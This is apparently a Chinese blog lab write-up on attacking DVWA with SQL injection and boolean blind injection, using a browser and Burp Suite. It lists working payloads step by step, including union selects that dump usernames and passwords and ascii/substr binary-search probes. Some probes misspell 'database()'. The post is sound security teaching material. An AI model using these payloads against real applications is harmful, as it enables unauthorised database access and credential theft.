sql注入与盲注

最新推荐文章于 2024-04-23 09:08:55 发布
最新推荐文章于 2024-04-23 09:08:55 发布
阅读量562 收藏 1
点赞数 2
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Maqiuqiu520/article/details/105839272
版权

实验环境要求:
1、安装win7或win10的笔记本或PC电脑一台,硬盘100GB,内存8GB
2、安装VMware® Workstation 14以上
总体目标:基于centos7搭建dvwa web服务靶机,使用主机上的浏览器和kali虚拟机作为攻击机。使用kali中的burpsuite和主机上的浏览器攻击dvwa上的sql注入和sql盲注漏洞。

任务一、使用主机浏览器攻击dvwa中sql注入漏洞(low)

1.判断是否存在注入,注入是字符型还是数字型。
在这里插入图片描述
2.猜解SQL查询语句中的字段数

输入1’ or ‘1’ = ‘1’ order by 1 #
输入1’ or ‘1’ = ‘1’ order by 2 # 输入1’ or
‘1’ = ‘1’ order by 3 #

在这里插入图片描述
在这里插入图片描述

3.确定显示的字段顺序

输入1' union select 1,2 #

在这里插入图片描述
4.获取当前数据库

database()显示当前数据库
输入1’ union select 1,database() #

在这里插入图片描述

5.获取数据库中的表

输入1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

在这里插入图片描述

任务二、使用kali攻击dvwa中sql注入漏洞(medium)

1.判断是否存在注入,注入是字符型还是数字型
在这里插入图片描述

2.判断是否存在注入,是否数字型,抓包更改参数id为1 or 1 = 1 猜解SQL查询语句中的字段数,抓包更改参数id为1 order by 2 确定显示的字段顺序,抓包更改参数id为1 union select 1,2 获取当前数据库,抓包更改参数id为1 union
select 1,database() 获取数据库中的表,抓包更改参数id为1 union select
1,group_concat(table_name) from information_schema.tables where
table_schema=database() 获取表中的字段名,抓包更改参数id为1 union select
1,group_concat(column_name) from information_schema.columns where
table_name=‘users’ 下载数据,抓包修改参数id为1 union select
group_concat(user_id,first_name,last_name),group_concat(password) from
users

任务三、使用主机浏览器攻击dvwa中sql盲注漏洞(low)

1.判断是否存在注入,注入是字符型还是数字型
输入1,显示相应用户存在
在这里插入图片描述
2.猜解当前数据库名

想要猜解数据库名,首先要猜解数据库名的长度,然后挨个猜解字符。
输入1’ and length(database())=1 # 显示不存在;
输入1’ and length(database())=2 #显示不存在;
输入1’ and length(database())=3#显示不存在;
输入1’ and length(database())=4 #显示存在:

3.猜解数据库中的表名
采用二分法猜解数据库名
输入1’ and ascii(substr(databse(),1,1))>97 #,显示存在,说明数据库名的第一个字符的ascii值大于97(小写字母a的ascii值);
输入1’ and ascii(substr(databse(),1,1))<122 #,显示存在,说明数据库名的第一个字符的ascii值小于122(小写字母z的ascii值);
输入1’ and ascii(substr(databse(),1,1))<109 #,显示存在,说明数据库名的第一个字符的ascii值小于109(小写字母m的ascii值);
输入1’ and ascii(substr(databse(),1,1))<103 #,显示存在,说明数据库名的第一个字符的ascii值小于103(小写字母g的ascii值);
输入1’ and ascii(substr(databse(),1,1))<100 #,显示不存在,说明数据库名的第一个字符的ascii值不小于100(小写字母d的ascii值);
输入1’ and ascii(substr(databse(),1,1))>100 #,显示不存在,说明数据库名的第一个字符的ascii值不大于100(小写字母d的ascii值),所以数据库名的第一个字符的ascii值为100,即小写字母d。

有菜的马哥
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入手动盲注案例
05-30
SQL注入手动盲注案例
SQL注入之基于布尔的盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
mysql查询库总记录数和库大小
qq_37372909的博客
05-19 473
下面是查询库数据条数 SELECT sum( TABLE_ROWS ) FROM `information_schema`.`tables` WHERE TABLE_SCHEMA='otms' 下面是查询库大小 select concat(round(sum(data_length/1024/1024),2),'MB') as data from `information_schema`.`tables` WHERE TABLE_SCHEMA='otms' ...
mysql手工注入技巧_MySQL数据库手工注入技巧
weixin_31303743的博客
01-19 337
MySQL数据库的注入很复杂、很精彩,完全是Access不能比的。因为MySQL的注入很灵活了,完全不像Access那样死板固定,我感觉Access的注入完全是靠人品,或者可以说,谁的表名、列名字典大,谁的成功率就大。根据我对MySQL的认识,注入时,基本可以通过爆、盲注、报错三种方式获得用户名和密码,在权限足够的情况下,还可以直接通过SQL语句插入并导出我们的一句话webshell。当拿到一个M...
sql注入盲注
最新发布
2302_79119987的博客
04-23 675
时间盲注又称延迟注入,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。如果页面延迟五秒,说明正确。注入语句与布尔盲注相似,但是过程太繁琐一般使用自动化注入。可以使用脚本进行猜测:(使用时做出修改)# 将url 替换成你的靶场关卡网址# 修改两个对应的payload# 目标网址(不带参数)# 猜解长度使用的payload# 枚举字符使用的payload(ascii(substr(,{n},1)) ={r})# 获取长度。
DVWA 实验报告:8、SQL 注入 SQL Injection(Blind)
看那白熊
05-30 693
占位
mysql 查询数据库、表相关信息
CSDN19970806的博客
03-23 415
/*查询所有的表的信息*/ select table_name 表明, engine, table_comment 描述, create_time 创建时间 from information_schema.tables where table_schema = (select database()) ; /*查询某个表的信息*/ select table_name ta...
sql注入学习(入门)
Maxmalloc的博客
10-07 460
主要借助sqllibs 学习了一下sql注入的大致原理。 sql大致流程都是这样(没试过盲注) 爆库名(通常不需要知道,可以直接调用database()函数),爆表名,爆列名,最后爆数据 所以按照步骤来写sql语句: 爆表名 select group_concat(table_name) from information_schema.tables where table_schema=datab...
webgote的例子(6)SQL注入盲注
时光凉春衫薄的博客
04-15 260
&#13;   SQL Injection - Blind (WS/SOAP) 本期演示的是盲注的手法。有些网站在与数据库交互的地方进行了很好的修饰,将报错的语句进行修改,即使你找到了注入点也无法下手拿数据,这个时候我们的步骤就比较麻烦了,我们只能通过对错的方式进行盲注(如下演示) 首先我们看一眼这是一个正常的显示页面。 加了一个点后也有不一样的地方。。。。。。。。 电影...
13、SQL注入——SQL盲注
qq_55202378的博客
12-05 225
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时还需要利用一些方法进行判断或尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能时页面内容的不同,也可能时响应时间的不同)。一般情况下,盲注可分为两种:基于布尔的盲注某些情况下,页面返回的结果只要两种(正常或者错误)。通过构造SQL判断语句,查看页面的返回结果(True 或False)来判断哪些SQL判断条件成立,通过此来获取数据库中的数据。基于时间的盲注
SQL注入盲注
xiao_he0123的博客
03-20 6959
SQL注入盲注前言一、盲注分类二、具体解析1.基于布尔的sql盲注首先要先了解一下sql注入截取字符串常用的函数:(1)mid()函数(2)substr()函数(3)left()函数具体注入方法2.基于时间的SQL盲注3.基于报错的SQL盲注1.extractvalue()函数2.uodatexml()函数3.floor()函数 前言 何为盲注盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面 一、盲注分类 盲注分为三类: (1)基于布尔的SQL盲注 (2)基于事
SQL注入语法类型和sql盲注
cangyu51462的博客
04-13 655
SQL注入语法类型和sql盲注
Sql盲注与普通注入的区别
热门推荐
过客璇璇的博客
03-12 3万+
Sql盲注与普通注入的区别 在学习sql注入的时候,好多同学都是不弄清楚原理,去浏览器上狂搜一下注入语句,就开始对老师给的靶机注入,虽然能注入成功,但是不清楚原理,对以后的学习和工作没有多大的好处。现在我就讲一下sql盲注与普通注入的区别! 首先,何为sql盲注?可能这个问题一下子就把你问蒙蔽了。 盲注就是在sql注入过程中,sql语句执行的选择后,选择的...
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
仅仅为了大家更好的学习!
SQL注入(+盲注).txt
10-13
SQL注入(+盲注).txt
SQL注入技巧之显注与盲注中过滤逗号绕过详析
09-09
SQL注入的绕过技巧有很多,下面这篇文章主要给大家介绍了关于SQL注入技巧之显注与盲注中过滤逗号绕过的相关资料,文中通过示例代码介绍的非常详细,需要的朋友们下面随着小编来一起学习学习吧
1+X 网络安全运营平台与管理 sql注入实验报告
路baby的博客
11-18 2161
项目化考核 1+X 证书(网络安全运营平台管理) sql注入实验报告 实验目的:实验设备 (环境)实验要求:实验原理:实验步骤:实验总结:
SQL Injection (Blind)之盲注(原理、分类、利用)
Innocence_0的博客
04-14 1020
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响 应时间不同)。一般情况下,盲注可分为两类:基于布尔的盲注(Boolean based)基于时间的盲注(Time based)
DVWA实验-sql盲注
Ping_Pig的博客
09-15 1091
sql盲注:顾名思义,就是盲人注入,没有页面报错信息可以分析了,那么该怎么呢?盲注又有哪些测试的方法呢? 盲注的测试类型: boolean注入 时间注入 我们接下来就来介绍如何去测试sql注入盲注,我们还是用dvwa来举例子 Low级别 我们看到low级别同样是输入框,我们输入了正常的1,返回结果为:数据库中存在用户ID。 我们输入恶意字符,同样也返回结果为:数据库中缺少用户ID。...
sql注入union盲注
07-28
回答: SQL注入盲注可以分为三类:布尔盲注、延时盲注和报错盲注。其中,布尔盲注是一种通过构造逻辑表达式的SQL语句来判断数据的具体内容的盲注方式。在布尔盲注中,页面在执行SQL语句后,只显示两种结果,通过构造逻辑表达式的SQL语句来判断数据的具体内容。\[1\]布尔盲注是一种基于布尔的SQL盲注,通过构造逻辑表达式的SQL语句来判断数据的具体内容。\[2\]当我们只能通过页面返回的结果的“是”与“否”来得到我们想要的信息时,就被称为布尔型盲注。\[3\]所以,如果你在进行SQL注入时,只能通过页面返回的结果的“是”与“否”来得到你想要的信息,那么你遇到的就是布尔型盲注。 #### 引用[.reference_title] - *1* [SQL注入盲注简单总结](https://blog.csdn.net/qq_42477007/article/details/96492174)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [SQL注入盲注](https://blog.csdn.net/xiao_he0123/article/details/123610491)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [SQL注入2——盲注(重学)](https://blog.csdn.net/qq_52263650/article/details/127737877)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值